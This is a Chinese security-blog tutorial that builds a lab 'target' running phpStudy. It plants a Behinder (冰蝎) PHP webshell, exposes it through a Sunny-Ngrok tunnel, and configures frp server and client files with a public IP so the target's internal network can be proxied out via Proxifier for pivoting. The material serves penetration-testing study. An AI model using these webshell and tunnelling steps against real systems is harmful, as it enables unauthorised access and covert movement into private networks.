freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

frp反向代理
2022-11-08 10:09:47
所属地 海外

准备环境

一台靶机
一台攻击机器
一台服务器

一、搭建内网环境

1.在靶机下载安装phpstudy_pro软件
下载地址:https://www.xp.cn/download.html

1667872628084.png

2.打开软件

1667872647167.png

3.修改端口为56789

1667872660809.png

4.访问url地址(http://localhost:56789/),查看是否搭建成功

1667872681033.png

4.在其根目录www目录下上传php冰蝎3马

1667872704698.png

1667872719836.png

4.靶机访问url地址(http://localhost:56789/shell.php)看是否被解析

1667872741596.png


二、建立隧道(windows演示)

1.在靶机使用命令./sunny clientid 205434289668开启隧道;linux下要赋予其最高权限chmod 777 sunny

1667872766219.png

1667872777529.png

2.在攻击机器使用外网环境访问url地址http://jilin.vipgz4.idcfengye.com/shell.php查看是否可以访问

1667872834482.png

3.攻击机器使用冰蝎连接木马


三、配置frp代理

1.因靶机web环境为windows,我的服务器为linux的,所以windows和linux版本的frp都要下载(这里我将所有的全部下载了,以后会有用)
下载地址:github自行查找

1667872873955.png

2.将下载的linux版本的frp上传到服务器(所有人可访问的外网服务器)内

1667872902745.png

3.赋予frp文件夹最高权限chmod 777 ./*

1667872921036.png

4.配置服务器的frps.ini(切记linux版本)

[common]
bind_addr=0.0.0.0
bind_port = 7100 #服务器端口
dashboard_addr = 0.0.0.0
dashboard_port = 7500 #仪表板监听端口
dashboard_user = admin #用户名
dashboard_pwd = admin #密码

1667872934657.png

4.执行./frps -c frps.ini 若端口被占用可杀掉(最好是在后台执行,创建screen模块,执行./frps -c frps.ini)

1667872972318.png

5.攻击机器访问服务器ip:7500

1667872997659.png

6.配置靶机的frp内的frpc.ini(切记weindows版本)

[common]
server_addr = 49.233.61.181 #服务器的公网IP
server_port = 7100 #服务器端口

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = #正向代理本地端口
remote_port = 6000 #正向代理服务器端口,必须保证服务端防火墙和安全组已允许该端口通过

1667873013420.png

7.在靶机执行frpc -c frpc.ini

1667873043290.png

8.查看攻击机器访问的服务器ip+7500,可发现已被代理出来

1667873058562.png

9.下载Proxifier代理工具
下载地址:https://www.onlinedown.net/soft/971579.htm

1667873072966.png

10.配置proxifier代理

1667873083989.png

1667873103652.png

1667873115259.png

# 渗透测试 # 黑客 # web安全 # 内网渗透 # 网络安全技术
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录